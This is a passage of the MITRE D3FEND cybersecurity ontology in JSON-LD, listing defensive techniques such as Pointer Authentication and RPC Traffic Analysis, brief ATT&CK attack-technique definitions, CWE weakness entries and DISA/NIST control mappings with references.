        "owl:NamedIndividual"
      ],
      "d3f:definition": "A user initialization configuration file is a file containing the information necessary to configure that part of a user's environment which is common to all applications and actions. User configurations may be overridden by more specific configuration information (such as that found in a application configuration file.)",
      "rdfs:label": "User Init Configuration File",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:ConfigurationFile"
        },
        {
          "@id": "d3f:UserLogonInitResource"
        }
      ],
      "skos:altLabel": "User Configuration File"
    },
    {
      "@id": "d3f:PointerAuthentication",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual",
        "d3f:PointerAuthentication"
      ],
      "d3f:authenticates": {
        "@id": "d3f:Pointer"
      },
      "d3f:d3fend-id": "D3-PAN",
      "d3f:definition": "Comparing the cryptographic hash or derivative of a pointer's value to an expected value.",
      "d3f:kb-article": "## How It Works\n\nPointer Authentication (frequently referred to as PAC, although the technique is properly Pointer Authentication) is a security feature to provide protection against attackers with memory read/write access.  A Pointer Authentication Code (PAC) is a cryptographic hash or derivative computed on the value of a pointer and some additional context information which can then provide a cryptographically strong guarantee about the likelihood that a pointer has been tampered with by an attacker.\n\nAlthough pointers are 64 bits, most systems have a substantially smaller virtual address space, leaving unused bits in pointers that can store the value of the PAC, this can be done to reduce memory space requirements. One implementation is in ARMv8.3-A.  A PAC is computed over the 64-bit pointer value and a 64-bit context value.  Instructions are introduced to deal with pointers: one category to compute and insert the PAC into a pointer, another category to verify the pointer and invalidate the pointer if the PAC does not check, and a third category to remove the pointer and restore the original value without verifying.\n\nThe ARM standard specifies a cryptographic algorithm called QARMA-64 (designed by Qualcomm) to compute the signature, although this algorithm is not required.  The architecture provides for five secret 128-bit Pointer Authentication keys: two for instruction pointers, two for data pointers, and a general key for signing larger blocks of data.\n\n## Considerations\n\nIn the ARM implementation, the mechanisms above for manipulating PACS are provided, but it is up to the code developer to manage the keys for the cryptographic algorithm.\n\n\nA known potential limitation of PACs concerns signing gadgets. Under certain circumstances PACs can be bypassed by forcing the system to run a signing gadget which will allow the signing of arbitrary pointers to occur.",
      "d3f:kb-reference": [
        {
          "@id": "d3f:Reference-PointerAuthenticationOnARMv8.3"
        },
        {
          "@id": "d3f:Reference-PointerAuthenticationProjectZero"
        }
      ],
      "rdfs:label": "Pointer Authentication",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:ApplicationHardening"
        },
        {
          "@id": "_:N8be0c73f2ddb48f2810b3d551e8a59f4"
        }
      ]
    },
    {
      "@id": "_:N8be0c73f2ddb48f2810b3d551e8a59f4",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:authenticates"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:Pointer"
      }
    },
    {
      "@id": "d3f:TA0105",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual",
        "d3f:OffensiveTactic"
      ],
      "rdfs:label": "Impact - ATTACK ICS",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:ATTACKICSTactic"
        },
        {
          "@id": "d3f:OffensiveTactic"
        }
      ],
      "skos:prefLabel": "Impact"
    },
    {
      "@id": "d3f:T1636.004",
      "@type": "owl:Class",
      "d3f:attack-id": "T1636.004",
      "d3f:definition": "Adversaries may utilize standard operating system APIs to gather SMS messages. On Android, this can be accomplished using the SMS Content Provider. iOS provides no standard API to access SMS messages.",
      "rdfs:label": "SMS Messages - ATTACK Mobile",
      "rdfs:subClassOf": {
        "@id": "d3f:T1636"
      },
      "skos:prefLabel": "SMS Messages"
    },
    {
      "@id": "d3f:control-name",
      "@type": "owl:DatatypeProperty",
      "d3f:definition": "The control (or control enhancement) name.",
      "rdfs:label": "control-name",
      "rdfs:subPropertyOf": {
        "@id": "d3f:d3fend-external-control-data-property"
      }
    },
    {
      "@id": "d3f:T1064",
      "@type": "owl:Class",
      "d3f:attack-id": "T1064",
      "d3f:definition": "**This technique has been deprecated. Please use [Command and Scripting Interpreter](https://attack.mitre.org/techniques/T1059) where appropriate.**",
      "owl:deprecated": true,
      "rdfs:comment": "**This technique has been deprecated. Please use [Command and Scripting Interpreter](https://attack.mitre.org/techniques/T1059) where appropriate.**",
      "rdfs:label": "Scripting",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:DefenseEvasionTechnique"
        },
        {
          "@id": "d3f:ExecutionTechnique"
        }
      ]
    },
    {
      "@id": "d3f:may-be-invoked-by",
      "@type": "owl:ObjectProperty",
      "owl:inverseOf": {
        "@id": "d3f:may-invoke"
      },
      "rdfs:label": "may-be-invoked-by",
      "rdfs:subPropertyOf": {
        "@id": "d3f:may-be-associated-with"
      }
    },
    {
      "@id": "d3f:T1055.004",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:attack-id": "T1055.004",
      "d3f:definition": "Adversaries may inject malicious code into processes via the asynchronous procedure call (APC) queue in order to evade process-based defenses as well as possibly elevate privileges. APC injection is a method of executing arbitrary code in the address space of a separate live process.",
      "d3f:may-invoke": {
        "@id": "d3f:CreateProcess"
      },
      "rdfs:label": "Asynchronous Procedure Call",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:T1055"
        },
        {
          "@id": "_:N14160e62fa754e189e4a43c644d7cf2a"
        }
      ]
    },
    {
      "@id": "_:N14160e62fa754e189e4a43c644d7cf2a",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:may-invoke"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:CreateProcess"
      }
    },
    {
      "@id": "d3f:CCI-000034_v2022-04-05",
      "@type": [
        "owl:NamedIndividual",
        "d3f:CCIControl"
      ],
      "d3f:broader": [
        {
          "@id": "d3f:InboundTrafficFiltering"
        },
        {
          "@id": "d3f:OutboundTrafficFiltering"
        }
      ],
      "d3f:contributor": {
        "@id": "d3f:DISA_FSO"
      },
      "d3f:definition": "The information system provides the capability for a privileged administrator to enable/disable organization-defined security policy filters under organization-defined conditions.",
      "d3f:member-of": {
        "@id": "d3f:CCICatalog_v2022-04-05"
      },
      "d3f:published": {
        "@type": "xsd:dateTime",
        "@value": "2009-05-13T00:00:00"
      },
      "rdfs:label": "CCI-000034"
    },
    {
      "@id": "d3f:Reference-UserLoggedInToMultipleHosts_MITRE",
      "@type": [
        "owl:NamedIndividual",
        "d3f:ExternalKnowledgeBase"
      ],
      "d3f:has-link": {
        "@type": "xsd:anyURI",
        "@value": "https://car.mitre.org/analytics/CAR-2013-02-012/"
      },
      "d3f:kb-abstract": "Most users use only one or two machines during the normal course of business. User accounts that log in to multiple machines, especially over a short period of time, may be compromised. Remote logins among multiple machines may be an indicator of Lateral Movement.\n\nCertain users will likely appear as being logged into several machines and may need to be \"whitelisted.\" Such users would include network admins or user names that are common to many hosts.",
      "d3f:kb-author": "MITRE",
      "d3f:kb-mitre-analysis": "",
      "d3f:kb-organization": "MITRE",
      "d3f:kb-reference-of": [
        {
          "@id": "d3f:AuthenticationEventThresholding"
        },
        {
          "@id": "d3f:AuthorizationEventThresholding"
        }
      ],
      "d3f:kb-reference-title": "CAR-2013-02-012: User Logged in to Multiple Hosts",
      "rdfs:label": "Reference - CAR-2013-02-012: User Logged in to Multiple Hosts - MITRE"
    },
    {
      "@id": "d3f:CCI-000030_v2022-04-05",
      "@type": [
        "owl:NamedIndividual",
        "d3f:CCIControl"
      ],
      "d3f:contributor": {
        "@id": "d3f:DISA_FSO"
      },
      "d3f:definition": "The information system enforces information flow control based on organization-defined metadata.",
      "d3f:member-of": {
        "@id": "d3f:CCICatalog_v2022-04-05"
      },
      "d3f:narrower": [
        {
          "@id": "d3f:InboundTrafficFiltering"
        },
        {
          "@id": "d3f:OutboundTrafficFiltering"
        }
      ],
      "d3f:published": {
        "@type": "xsd:dateTime",
        "@value": "2009-05-13T00:00:00"
      },
      "rdfs:label": "CCI-000030"
    },
    {
      "@id": "d3f:T1474.003",
      "@type": "owl:Class",
      "d3f:attack-id": "T1474.003",
      "d3f:definition": "Adversaries may manipulate application software prior to receipt by a final consumer for the purpose of data or system compromise. Supply chain compromise of software can take place in a number of ways, including manipulation of the application source code, manipulation of the update/distribution mechanism for that software, or replacing compiled releases with a modified version.",
      "rdfs:label": "Compromise Software Supply Chain - ATTACK Mobile",
      "rdfs:subClassOf": {
        "@id": "d3f:T1474"
      },
      "skos:prefLabel": "Compromise Software Supply Chain"
    },
    {
      "@id": "d3f:T1574.004",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:attack-id": "T1574.004",
      "d3f:definition": "Adversaries may execute their own payloads by placing a malicious dynamic library (dylib) with an expected name in a path a victim application searches at runtime. The dynamic loader will try to find the dylibs based on the sequential order of the search paths. Paths to dylibs may be prefixed with <code>@rpath</code>, which allows developers to use relative paths to specify an array of search paths used at runtime based on the location of the executable.  Additionally, if weak linking is used, such as the <code>LC_LOAD_WEAK_DYLIB</code> function, an application will still execute even if an expected dylib is not present. Weak linking enables developers to run an application on multiple macOS versions as new APIs are added.",
      "d3f:may-create": {
        "@id": "d3f:SharedLibraryFile"
      },
      "d3f:may-modify": {
        "@id": "d3f:SharedLibraryFile"
      },
      "rdfs:label": "Dylib Hijacking",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:T1574"
        },
        {
          "@id": "_:N0a519a4ecff842ae8e89c0dda402522a"
        },
        {
          "@id": "_:N58782cdda9fe479c95add540600aa7f9"
        }
      ]
    },
    {
      "@id": "_:N0a519a4ecff842ae8e89c0dda402522a",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:may-create"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:SharedLibraryFile"
      }
    },
    {
      "@id": "_:N58782cdda9fe479c95add540600aa7f9",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:may-modify"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:SharedLibraryFile"
      }
    },
    {
      "@id": "d3f:loaded-by",
      "@type": "owl:ObjectProperty",
      "d3f:definition": "x loaded-by y: The entity x is brought into memory by entity y.",
      "owl:inverseOf": {
        "@id": "d3f:loads"
      },
      "rdfs:label": "loaded-by",
      "rdfs:subPropertyOf": {
        "@id": "d3f:associated-with"
      }
    },
    {
      "@id": "d3f:SoftwareClock",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:definition": "A clock implemented in software which may synchronize with hardware clocks or external time sources.",
      "d3f:implemented-by": {
        "@id": "d3f:Software"
      },
      "rdfs:label": "Software Clock",
      "rdfs:seeAlso": {
        "@id": "https://linux.die.net/sag/hw-sw-clocks.html"
      },
      "rdfs:subClassOf": [
        {
          "@id": "d3f:Clock"
        },
        {
          "@id": "_:N8f13ee095a1249a6ac04ad264b568212"
        }
      ]
    },
    {
      "@id": "_:N8f13ee095a1249a6ac04ad264b568212",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:implemented-by"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:Software"
      }
    },
    {
      "@id": "d3f:CWE-240",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-240",
      "d3f:definition": "The product does not handle or incorrectly handles when two or more structural elements should be consistent, but are not.",
      "rdfs:label": "Improper Handling of Inconsistent Structural Elements",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:CWE-237"
        },
        {
          "@id": "d3f:CWE-707"
        }
      ]
    },
    {
      "@id": "d3f:TA0008",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual",
        "d3f:OffensiveTactic"
      ],
      "d3f:definition": "The adversary is trying to move through your environment.\n\nLateral Movement consists of techniques that adversaries use to enter and control remote systems on a network. Following through on their primary objective often requires exploring the network to find their target and subsequently gaining access to it. Reaching their objective often involves pivoting through multiple systems and accounts to gain. Adversaries might install their own remote access tools to accomplish Lateral Movement or use legitimate credentials with native network and operating system tools, which may be stealthier.",
      "d3f:display-order": 8,
      "rdfs:label": "Lateral Movement",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:ATTACKEnterpriseTactic"
        },
        {
          "@id": "d3f:OffensiveTactic"
        }
      ]
    },
    {
      "@id": "d3f:T1574.009",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:attack-id": "T1574.009",
      "d3f:creates": {
        "@id": "d3f:ExecutableFile"
      },
      "d3f:definition": "Adversaries may execute their own malicious payloads by hijacking vulnerable file path references. Adversaries can take advantage of paths that lack surrounding quotations by placing an executable in a higher level directory within the path, so that Windows will choose the adversary's executable to launch.",
      "rdfs:label": "Path Interception by Unquoted Path",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:T1574"
        },
        {
          "@id": "_:N8712c69acfac4dada39ff7fcd914063b"
        }
      ]
    },
    {
      "@id": "_:N8712c69acfac4dada39ff7fcd914063b",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:creates"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:ExecutableFile"
      }
    },
    {
      "@id": "d3f:T1575",
      "@type": "owl:Class",
      "d3f:attack-id": "T1575",
      "d3f:definition": "Adversaries may use Android’s Native Development Kit (NDK) to write native functions that can achieve execution of binaries or functions. Like system calls on a traditional desktop operating system, native code achieves execution on a lower level than normal Android SDK calls.",
      "rdfs:label": "Native API - ATTACK Mobile",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:ATTACKMobileDefenseEvasionTechnique"
        },
        {
          "@id": "d3f:ATTACKMobileExecutionTechnique"
        }
      ],
      "skos:prefLabel": "Native API"
    },
    {
      "@id": "d3f:Evict",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual",
        "d3f:DefensiveTactic"
      ],
      "d3f:definition": "The eviction tactic is used to remove an adversary from a computer network.",
      "d3f:display-order": 4,
      "d3f:display-priority": 0,
      "rdfs:label": "Evict",
      "rdfs:subClassOf": {
        "@id": "d3f:DefensiveTactic"
      }
    },
    {
      "@id": "d3f:RPCTrafficAnalysis",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual",
        "d3f:RPCTrafficAnalysis"
      ],
      "d3f:analyzes": {
        "@id": "d3f:RPCNetworkTraffic"
      },
      "d3f:d3fend-id": "D3-RTA",
      "d3f:definition": "Monitoring the activity of remote procedure calls in communication traffic to establish standard protocol operations and potential attacker activities.",
      "d3f:kb-article": "## How it works\nA remote procedure call (RPC) enables one computer to execute a specific function on another computer, as if it were a local application process. There are numerous RPC specifications and implementations. RPC capabilities can be abused by attackers in order to achieve a variety of tactical objectives including execution, persistence, initial access, and more. RPC proxies may be used to collect and store RPC traffic. RPCs can occur over network sockets or named pipes.\n\nAnalytics look for unauthorized behavior such as:\n\n* Processes being launched or scheduled remotely\n* System configurations being changed remotely\n* Unauthorized file read activity\n\nExample RPC Protocols:\n\n* DCE/RPC\n* CORBA\n* Open Network Computing Remote Procedure Call\n* D-Bus\n* XML-RPC\n* JSON-RPC\n* SOAP\n* Apache Thrift\n\n## Considerations\n* RPC is widely used in enterprise environments, and significant data filtering may be required in large environments to enable analytic processing.\n* RPC traffic may occur over a pipe, or within a host over loopback interface, thus making network collection difficult.",
      "d3f:kb-reference": [
        {
          "@id": "d3f:Reference-CAR-2014-11-007-RemoteWindowsManagementInstrumentation_WMI_OverRPC_MITRE"
        },
        {
          "@id": "d3f:Reference-CreateRemoteProcessViaWMIC_MITRE_Other"
        },
        {
          "@id": "d3f:Reference-RPCCallInterception_CrowdstrikeInc"
        },
        {
          "@id": "d3f:Reference-RemotelyLaunchedExecutablesViaServices_MITRE"
        },
        {
          "@id": "d3f:Reference-RemotelyLaunchedExecutablesViaWMI_MITRE"
        },
        {
          "@id": "d3f:Reference-RemotelyScheduledTasksViaSchtasks_MITRE"
        },
        {
          "@id": "d3f:Reference-SMBWriteRequest-NamedPipes_MITRE"
        },
        {
          "@id": "d3f:Reference-CAR-2014-05-001%3ARPCActivity_MITRE"
        }
      ],
      "d3f:synonym": "RPC Protocol Analysis",
      "rdfs:label": "RPC Traffic Analysis",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:NetworkTrafficAnalysis"
        },
        {
          "@id": "_:N22e5724f28da4095b57e48617033e980"
        }
      ]
    },
    {
      "@id": "_:N22e5724f28da4095b57e48617033e980",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:analyzes"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:RPCNetworkTraffic"
      }
    },
    {
      "@id": "d3f:RTSPServer",
      "@type": "owl:Class",
      "d3f:definition": "A streaming server that utilizes the real-time streaming protocol.",
      "rdfs:label": "RTSP Server",
      "rdfs:subClassOf": {
        "@id": "d3f:NetworkAudioVisualStreamingResource"
      }
    },
    {
      "@id": "d3f:CCI-002277_v2022-04-05",
      "@type": [
        "owl:NamedIndividual",
        "d3f:CCIControl"
      ],
      "d3f:broader": {
        "@id": "d3f:UserAccountPermissions"
      },
      "d3f:contributor": {
        "@id": "d3f:DISA_FSO"
      },
      "d3f:definition": "The information system provides authorized individuals (or processes acting on behalf of individuals) the capability to define the value of associated security attributes.",
      "d3f:member-of": {
        "@id": "d3f:CCICatalog_v2022-04-05"
      },
      "d3f:published": {
        "@type": "xsd:dateTime",
        "@value": "2013-06-24T00:00:00"
      },
      "rdfs:label": "CCI-002277"
    },
    {
      "@id": "d3f:SPARTAThing",
      "@type": "owl:Class",
      "rdfs:label": "SPARTA Thing",
      "rdfs:subClassOf": {
        "@id": "d3f:ExternalThreatModelThing"
      }
    },
    {
      "@id": "d3f:NIST_SP_800-53_R5_AC-2_5",
      "@type": [
        "owl:NamedIndividual",
        "d3f:NISTControl"
      ],
      "d3f:control-name": "Account Management | Inactivity Logout",
      "d3f:member-of": {
        "@id": "d3f:NIST_SP_800-53_R5"
      },
      "d3f:related": {
        "@id": "d3f:AccountLocking"
      },
      "rdfs:label": "AC-2(5)"
    },
    {
      "@id": "d3f:LevenshteinMatching",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:d3fend-id": "D3A-LM",
      "d3f:definition": "The Levenshtein distance (LD) is a metric for measuring the differences between two sequences - or strings. Informally, the LD is the number of individual edits one would have to make to turn one sequence into another.",
      "d3f:kb-article": "## References\n1. Navarro, G. (2001). A guided tour to approximate string matching. _ACM Computing Surveys_, 33(1), 31-88. [Link](https://doi.org/10.1145/375360.375365)",
      "d3f:synonym": "Edit Distance",
      "rdfs:label": "Levenschtein Matching",
      "rdfs:subClassOf": {
        "@id": "d3f:ApproximateStringMatching"
      }
    },
    {
      "@id": "d3f:DeserializationFunction",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:definition": "Function with an input of serialized data which deserializes that data, usually with data parsing methods.",
      "rdfs:label": "Deserialization Function",
      "rdfs:subClassOf": {
        "@id": "d3f:Subroutine"
      }
    },
    {
      "@id": "d3f:Reference-SystemAndMethodForVulnerabilityRiskAssessment",
      "@type": [
        "owl:NamedIndividual",
        "d3f:PatentReference"
      ],
      "d3f:has-link": {
        "@type": "xsd:anyURI",
        "@value": "https://patents.google.com/patent/US9317692B2"
      },
      "d3f:kb-abstract": "Embodiments of the present invention are directed to a method and system for automated risk analysis. The method includes accessing host configuration information of a host and querying a vulnerability database based on the host configuration information. The method further includes receiving a list of vulnerabilities and accessing a plurality of vulnerability scores. The list of vulnerabilities corresponds to vulnerabilities of the host. Vulnerabilities can be removed from the list based on checking for installed fixes corresponding to vulnerability. A composite risk score can then be determined for the host a nd each software product of the host based on the plurality of vulnerability scores. An aggregate risk score can then be determined for the host and each software product of the host based on the plurality of vulnerability scores.",
      "d3f:kb-author": "Matthew Cruz Elder, Darrell Martin Kienzle, Pratyusa K. Manadhata, Ryan Kumar Persaud",
      "d3f:kb-organization": "CA Inc",
      "d3f:kb-reference-of": {
        "@id": "d3f:AssetVulnerabilityEnumeration"
      },
      "d3f:kb-reference-title": "System and method for vulnerability risk analysis",
      "rdfs:label": "Reference - System and method for vulnerability risk analysis"
    },
    {
      "@id": "d3f:CWE-86",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-86",
      "d3f:definition": "The product does not neutralize or incorrectly neutralizes invalid characters or byte sequences in the middle of tag names, URI schemes, and other identifiers.",
      "rdfs:label": "Improper Neutralization of Invalid Characters in Identifiers in Web Pages",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:CWE-436"
        },
        {
          "@id": "d3f:CWE-79"
        }
      ]
    },
    {
      "@id": "d3f:SPARTAResourceDevelopmentTechnique",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:enables": {
        "@id": "d3f:ST0002"
      },
      "rdfs:label": "Resource Development Technique - SPARTA",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:SPARTATechnique"
        },
        {
          "@id": "_:Nfe345642927748d297d73ec2416c9107"
        }
      ],
      "skos:prefLabel": "Resource Development Technique"
    },
    {
      "@id": "_:Nfe345642927748d297d73ec2416c9107",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:enables"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:ST0002"
      }
    },
    {
      "@id": "d3f:T1588",
      "@type": "owl:Class",
      "d3f:attack-id": "T1588",
      "d3f:definition": "Adversaries may buy and/or steal capabilities that can be used during targeting. Rather than developing their own capabilities in-house, adversaries may purchase, freely download, or steal them. Activities may include the acquisition of malware, software (including licenses), exploits, certificates, and information relating to vulnerabilities. Adversaries may obtain capabilities to support their operations throughout numerous phases of the adversary lifecycle.",
      "rdfs:label": "Obtain Capabilities",
      "rdfs:subClassOf": {
        "@id": "d3f:ResourceDevelopmentTechnique"
      }
    },
    {
      "@id": "d3f:CWE-570",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-570",
      "d3f:definition": "The product contains an expression that will always evaluate to false.",
      "rdfs:label": "Expression is Always False",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-710"
      }
    },
    {
      "@id": "d3f:CCI-001764_v2022-04-05",
      "@type": [
        "owl:NamedIndividual",
        "d3f:CCIControl"
      ],
      "d3f:broader": [
        {
          "@id": "d3f:ExecutableAllowlisting"
        },
        {
          "@id": "d3f:ExecutableDenylisting"
        }
      ],
      "d3f:contributor": {
        "@id": "d3f:DISA_FSO"
      },
      "d3f:definition": "The information system prevents program execution in accordance with organization-defined policies regarding software program usage and restrictions, and/or rules authorizing the terms and conditions of software program usage.",
      "d3f:member-of": {
        "@id": "d3f:CCICatalog_v2022-04-05"
      },
      "d3f:published": {
        "@type": "xsd:dateTime",
        "@value": "2013-02-28T00:00:00"
      },
      "rdfs:label": "CCI-001764"
    },
    {
      "@id": "d3f:T1148",
      "@type": "owl:Class",
      "d3f:attack-id": "T1148",
      "d3f:definition": "The <code>HISTCONTROL</code> environment variable keeps track of what should be saved by the <code>history</code> command and eventually into the <code>~/.bash_history</code> file when a user logs out. This setting can be configured to ignore commands that start with a space by simply setting it to \"ignorespace\". <code>HISTCONTROL</code> can also be set to ignore duplicate commands by setting it to \"ignoredups\". In some Linux systems, this is set by default to \"ignoreboth\" which covers both of the previous examples. This means that “ ls” will not be saved, but “ls” would be saved by history. <code>HISTCONTROL</code> does not exist by default on macOS, but can be set by the user and will be respected. Adversaries can use this to operate without leaving traces by simply prepending a space to all of their terminal commands.",
      "owl:deprecated": true,
      "rdfs:comment": "This technique has been revoked by T1562.003",
      "rdfs:label": "HISTCONTROL",
      "rdfs:seeAlso": {
        "@id": "d3f:T1562.003"
      },
      "rdfs:subClassOf": {
        "@id": "d3f:DefenseEvasionTechnique"
      }
    },
    {
      "@id": "d3f:OSAPIOpenFile",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:definition": "An OS API function that opens a file for reading, writing, or both, and return a handle or descriptor that can be used to interact with the file.",
      "d3f:invokes": {
        "@id": "d3f:OpenFile"
      },
      "rdfs:label": "OS API Open File",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:OSAPISystemFunction"
        },
        {
          "@id": "_:N02432584959e42fd9af6f89c399a3520"
        }
      ]
    },
    {
      "@id": "_:N02432584959e42fd9af6f89c399a3520",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:invokes"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:OpenFile"
      }
    },
    {
      "@id": "d3f:SystemClockUpdateEvent",
      "@type": "owl:Class",
      "d3f:definition": "An event in which the operating system's primary timekeeping value is modified or synchronized.",
      "rdfs:label": "System Clock Update Event",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:SoftwareClockEvent"
        },
        {
          "@id": "_:N7179ceb97a844bd8b3b6fa642b413b03"
        }
      ]
    },
    {
      "@id": "_:N7179ceb97a844bd8b3b6fa642b413b03",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:has-participant"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:OperatingSystemClock"
      }
    },
    {
      "@id": "d3f:step-2",
      "@type": "owl:NamedIndividual",
      "d3f:invokes": {
        "@id": "d3f:ImpersonateUser"
      },
      "rdfs:label": "Step 2 - Impersonate User"
    },
    {
      "@id": "d3f:CWE-615",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-615",
      "d3f:definition": "While adding general comments is very useful, some programmers tend to leave important data, such as: filenames related to the web application, old links or links which were not meant to be browsed by users, old code fragments, etc.",
      "rdfs:label": "Inclusion of Sensitive Information in Source Code Comments",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-540"
      }
    },
    {
      "@id": "d3f:CCI-001118_v2022-04-05",
      "@type": [
        "owl:NamedIndividual",
        "d3f:CCIControl"
      ],
      "d3f:broader": {
        "@id": "d3f:NetworkIsolation"
      },
      "d3f:contributor": {
        "@id": "d3f:DISA_FSO"
      },
      "d3f:definition": "The information system implements host-based boundary protection mechanisms for servers, workstations, and mobile devices.",
      "d3f:member-of": {
        "@id": "d3f:CCICatalog_v2022-04-05"
      },
      "d3f:published": {
        "@type": "xsd:dateTime",
        "@value": "2009-09-21T00:00:00"
      },
      "rdfs:label": "CCI-001118"
    },
    {
      "@id": "d3f:T1636.005",
      "@type": "owl:Class",
      "d3f:attack-id": "T1636.005",
      "d3f:definition": "Adversaries may utilize standard operating system APIs to gather account data. On Android, this can be accomplished by using the AccountManager API. For example, adversaries may use the `getAccounts()` method to list all accounts.(Citation: Android_AccountManager_Feb2025) On iOS, this can be accomplished by using the Keychain services.",
      "rdfs:label": "Accounts - ATTACK Mobile",
      "rdfs:subClassOf": {
        "@id": "d3f:T1636"
      },
      "skos:prefLabel": "Accounts"
    },
    {
      "@id": "d3f:T1190",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:attack-id": "T1190",
      "d3f:definition": "Adversaries may attempt to exploit a weakness in an Internet-facing host or system to initially access a network. The weakness in the system can be a software bug, a temporary glitch, or a misconfiguration.",
      "d3f:injects": {
        "@id": "d3f:DatabaseQuery"
      },
      "d3f:modifies": {
        "@id": "d3f:ProcessSegment"
      },
      "d3f:produces": {
        "@id": "d3f:InboundInternetNetworkTraffic"
      },
      "rdfs:label": "Exploit Public-Facing Application",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:InitialAccessTechnique"
        },
        {
          "@id": "_:N0da59aa4c04a4818b383cc06af825746"
        },
        {
          "@id": "_:N43c2adb6664c49b2bf452e81eaec2df6"
        },
        {
          "@id": "_:N2fb966469c5d43ac99598b6d0a28ed63"
        }
      ]
    },
    {
      "@id": "_:N0da59aa4c04a4818b383cc06af825746",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:injects"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:DatabaseQuery"
      }
    },
    {
      "@id": "_:N43c2adb6664c49b2bf452e81eaec2df6",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:modifies"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:ProcessSegment"
      }
    },
    {
      "@id": "_:N2fb966469c5d43ac99598b6d0a28ed63",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:produces"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:InboundInternetNetworkTraffic"
      }
    },
    {
      "@id": "d3f:M1053",
      "@type": [
        "owl:NamedIndividual",
        "d3f:ATTACKEnterpriseMitigation"
      ],
      "d3f:d3fend-comment": "Comprehensive IT disaster recovery plans are outside the current scope of D3FEND.",
      "rdfs:label": "Data Backup"
    },
    {
      "@id": "d3f:iOSProcess",
      "@type": [
        "owl:NamedIndividual",
        "d3f:Process"
      ],
      "rdfs:label": "iOS Process"
    },
    {
      "@id": "d3f:CCI-002710_v2022-04-05",
      "@type": [
        "owl:NamedIndividual",
        "d3f:CCIControl"
      ],
      "d3f:broader": [
        {
          "@id": "d3f:DriverLoadIntegrityChecking"
        },
        {
          "@id": "d3f:FileHashing"
        },
        {
          "@id": "d3f:PointerAuthentication"
        },
        {
          "@id": "d3f:TPMBootIntegrity"
        }
      ],
      "d3f:contributor": {
        "@id": "d3f:DISA_FSO"
      },
      "d3f:definition": "The information system performs an integrity check of organization-defined software at startup, at organization-defined transitional states or security-relevant events, or on an organization-defined frequency.",
      "d3f:member-of": {
        "@id": "d3f:CCICatalog_v2022-04-05"
      },
      "d3f:published": {
        "@type": "xsd:dateTime",
        "@value": "2013-07-11T00:00:00"
      },
      "rdfs:label": "CCI-002710"
    },
    {
      "@id": "d3f:MicrosoftWordDOTXFile",
      "@type": [
        "owl:NamedIndividual",
        "d3f:DocumentFile"
      ],
      "rdfs:label": "Microsoft Word DOTX File"
    },
    {
      "@id": "d3f:M1050",
      "@type": [
        "owl:NamedIndividual",
        "d3f:ATTACKEnterpriseMitigation"
      ],
      "d3f:related": [
        {
          "@id": "d3f:ApplicationHardening"
        },
        {
          "@id": "d3f:ExceptionHandlerPointerValidation"
        },
        {
          "@id": "d3f:InboundTrafficFiltering"
        },
        {
          "@id": "d3f:ShadowStackComparisons"
        }
      ],
